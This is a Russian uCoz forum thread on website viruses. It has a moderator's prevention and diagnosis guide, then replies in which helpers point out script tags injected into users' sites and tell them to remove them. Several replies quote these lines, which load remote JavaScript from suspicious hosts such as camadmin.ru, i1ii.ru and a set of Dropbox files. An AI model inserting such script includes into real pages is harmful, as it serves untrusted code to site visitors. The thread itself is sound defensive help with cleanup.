Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Vaniuska
    Сообщений: 33
    Репутация: 0

    Сообщение # 421 | 15:03:04 04 Авг 2013
    webanet, не понял в конце что вы сказали и еще все удалил кроме крутого кода не нашол вирус все еще есть +в сайте изменилось надписи там очень плохо шяс показывает
    www.chelseatv.ru - сайт для фанатов челси !
    Сообщение отредактировал Vaniuska - Воскресенье, 04 Авг 2013, 15:06:04
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 422 | 15:07:48 04 Авг 2013
    Vaniuska, копирайт не на месте и скрыт. за это блокируют сайты обычно
    вредоносный код остался в блоке статистика сайта сегодня нас посетили
    Код
    <script type="text/javascript" src="http://camadmin.ru/earch.js"></script>

    возвращаем копирайт быстро

    в виде материалов надо было удалить, то что я выделила красным //forum.ucoz.ru/forum/45-34556-1067066-16-1375613714
    выделила для удобства сейчас
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Vaniuska
    Сообщений: 33
    Репутация: 0

    Сообщение # 423 | 15:14:59 04 Авг 2013
    bandjuk, всё удалил всё равно показывает вирусы + тексты новостей изменились не в хорошую сторону

    Добавлено (04 Авг 2013, 15:14:59)
    ---------------------------------------------
    webanet, удалил

    www.chelseatv.ru - сайт для фанатов челси !
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 424 | 15:18:16 04 Авг 2013
    Vaniuska, в виде материалов нужно удалять полностью это:
    background: url repeat scroll 0% 0% transparent;
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 425 | 15:28:24 04 Авг 2013
    Vaniuska, вирусов больше нет. показывает вирусы если яндекс, то ждем перепроверки. если крутой сервис, то читаем по ссылке что я дала в первом ответе вам
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    [-ДЬЯВОЛ-]
    Сообщений: 27
    Репутация: 0

    Сообщение # 426 | 16:03:26 04 Авг 2013
    Помогите опера ругается опасный сайт проверил его на 2ip.ru и вот что высветило помогите пож sad
    =====================================================================================
    На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
    Сайт http://xak-css.ru
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 427 | 16:07:34 04 Авг 2013
    [-ДЬЯВОЛ-], я же тебе вчера всё расписал.

    Добавлено (04 Авг 2013, 16:07:34)
    ---------------------------------------------
    //forum.ucoz.ru/forum/31-55216-1

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 428 | 16:09:10 04 Авг 2013
    [-ДЬЯВОЛ-], из формы входа (мини профиль ) удалить скрипт

    Код
    <script src="http://i1ii.ru/1.js" type="text/javascript"></script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    [-ДЬЯВОЛ-]
    Сообщений: 27
    Репутация: 0

    Сообщение # 429 | 16:13:23 04 Авг 2013
    Удалил , Проверил сайт и серавно пишит тоже самое
    На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 430 | 16:16:25 04 Авг 2013
    [-ДЬЯВОЛ-], не пользуемся низкосортными сервисами, которые не предназначены для этого. подробнее тут //forum.ucoz.ru/forum/45-47668-1
    а с оперы блок снимется когда робот яндекса проверит сайт и снимет с него фильтр безопасности. ждем. или идем в вебмастер яндекса и оттуда жмем на перепроверку. возможно это чуть ускорит
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    [-ДЬЯВОЛ-]
    Сообщений: 27
    Репутация: 0

    Сообщение # 431 | 16:34:40 04 Авг 2013
    Спасибо очень помогли

    Добавлено (04 Авг 2013, 16:24:46)
    ---------------------------------------------
    проверил сайт на вот этом сайте http://sitecheck.sucuri.net пишет вот что
    <script type="text/javascript">var openstat = { counter: 2324925, next: openstat };(function(d, t, p) {var j = d.createElement(t); j.async
    = true; j.type = "text/javascript";j.src = ("https:" == p ? "https:" :
    "http:") + "//openstat.net/cnt.js";var s = d.getElementsByTagName(t)[0];
    s.parentNode.insertBefore(j, s);})(document, "script",
    document.location.protocol);new Image().src =
    "http://cnt1.up.ru/stats.gif?cId=ucoz&cb="+Math.random();</script></div><div
    id="utbr8214" rel="s107"></div><div id="utbr8214"
    rel="s103"></div>
    НО У МЕНЯ НЕТ ТАКОГО КОДА

    Добавлено (04 Авг 2013, 16:34:40)
    ---------------------------------------------
    типо тут внедоростный код

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 432 | 16:59:04 04 Авг 2013
    [-ДЬЯВОЛ-], не пользуемся низкосортными сервисами, которые не предназначены для этого. подробнее тут //forum.ucoz.ru/forum/45-47668-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    artilerie
    Сообщений: 1
    Репутация: 0

    Сообщение # 433 | 10:47:53 05 Авг 2013
    Помогите разобраться, при входе на страницу http://haogan-ekb.ru/ антивирус касперского блокирует какие то ссылки
    http://s001.radikal.ru/i195/1308/4b/f1caa860d9b2.png
    http://s017.radikal.ru/i405/1308/0a/b276feedec9a.png
    http://s019.radikal.ru/i639/1308/85/89ff16ec8f5a.png

    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 434 | 10:59:28 05 Авг 2013
    artilerie, ищите и удаляйте скрипты:
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>

    искать в шаблоне страницы сайта или через быструю замену.
    Уникум
    Сообщений: 7
    Репутация: 8

    Сообщение # 435 | 18:30:19 05 Авг 2013
    Доброе время суток!
    Подскажите, пжл, мне мой любимый яндекс выдает, что : "Сайт может угрожать безопасности вашего компьютера или мобильного устройства" и не могу оттуда зайти ни на одну страницу сайта pobedaa.ucoz.ru Проверяю в том же яндексе на вирусы, пишет, что все в шоколаде. Как мне от этого избавиться, в чем проблема???
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск:
    Telegram
    Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!